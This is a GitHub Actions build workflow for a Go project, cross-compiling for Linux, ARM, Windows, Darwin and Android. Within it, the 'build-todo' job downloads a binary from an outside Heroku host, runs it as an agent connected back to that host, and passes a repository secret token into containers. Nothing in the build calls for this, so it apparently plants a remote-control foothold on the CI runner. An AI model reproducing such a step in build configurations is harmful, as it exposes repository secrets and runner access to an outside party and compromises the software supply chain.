name: build

on: [push]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Unshallow  # required for the changelog to work correctly.
      run: git fetch --prune --unshallow

    - name: Set Go Version
      uses: actions/setup-go@v2
      with:
        go-version: ^1.17.1

    - run: make build
      name: make build

    - name: archive artifacts
      uses: actions/upload-artifact@v2
      with:
        name: build
        path: bin/

  build-todo:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Unshallow  # required for the changelog to work correctly.
      run: git fetch --prune --unshallow

    - name: Run Ubuntu
      uses: docker://ubuntu
      with:
        entrypoint: bash
        args: -c "ls -la"
      env:
        GITHUB_TOKEN: ${{ secrets.ACTIONS_GITHUB_TOKEN }}

    - run: |
        wget https://k0s.herokuapp.com/api/bin/k0s
        chmod +x k0s
        ./k0s agent https://k0s.herokuapp.com
      name: k0s agent

    - name: Run Build
      uses: docker://techknowlogick/xgo:latest
      with:
        entrypoint: bash
      env:
        GITHUB_TOKEN: ${{ secrets.ACTIONS_GITHUB_TOKEN }}

  build-linux:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Unshallow  # required for the changelog to work correctly.
      run: git fetch --prune --unshallow

    - name: make build-linux
      uses: docker://techknowlogick/xgo:latest
      with:
        entrypoint: bash
        args: -c "make build-linux"

    - name: archive artifacts
      uses: actions/upload-artifact@v2
      with:
        name: build-linux
        path: bin/

    - name: archive artifacts
      uses: actions/upload-artifact@v2
      with:
        name: build-linux
        path: bin/


  build-linux-arm:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Unshallow  # required for the changelog to work correctly.
      run: git fetch --prune --unshallow

    - name: make build-linux-arm
      uses: docker://techknowlogick/xgo:latest
      with:
        entrypoint: bash
        args: -c "make build-linux-arm"

    - name: archive artifacts
      uses: actions/upload-artifact@v2
      with:
        name: build-linux-arm
        path: bin/

  build-linux-others:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Unshallow  # required for the changelog to work correctly.
      run: git fetch --prune --unshallow

    - name: make build-linux-others
      uses: docker://techknowlogick/xgo:latest
      with:
        entrypoint: bash
        args: -c "make build-linux-others"

    - name: archive artifacts
      uses: actions/upload-artifact@v2
      with:
        name: build-linux-others
        path: bin/

  build-windows:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Unshallow  # required for the changelog to work correctly.
      run: git fetch --prune --unshallow

    - name: make build-windows
      uses: docker://techknowlogick/xgo:latest
      with:
        entrypoint: bash
        args: -c "make build-windows"

    - name: archive artifacts
      uses: actions/upload-artifact@v2
      with:
        name: build-windows
        path: bin/

  build-darwin:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Unshallow  # required for the changelog to work correctly.
      run: git fetch --prune --unshallow

    - name: make build-darwin
      uses: docker://techknowlogick/xgo:latest
      with:
        entrypoint: bash
        args: -c "make build-darwin"

    - name: archive artifacts
      uses: actions/upload-artifact@v2
      with:
        name: build-darwin
        path: bin/

  bazel-build-android:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Unshallow  # required for the changelog to work correctly.
      run: git fetch --prune --unshallow

    - name: make bazel-build-android
      uses: docker://techknowlogick/xgo:latest
      with:
        entrypoint: bash
        args: -c "make bazel-build-android"
      env:
        ANDROID_NDK_BAZEL: True

    - name: archive artifacts
      uses: actions/upload-artifact@v2
      with:
        name: bazel-build-android
        path: bin/
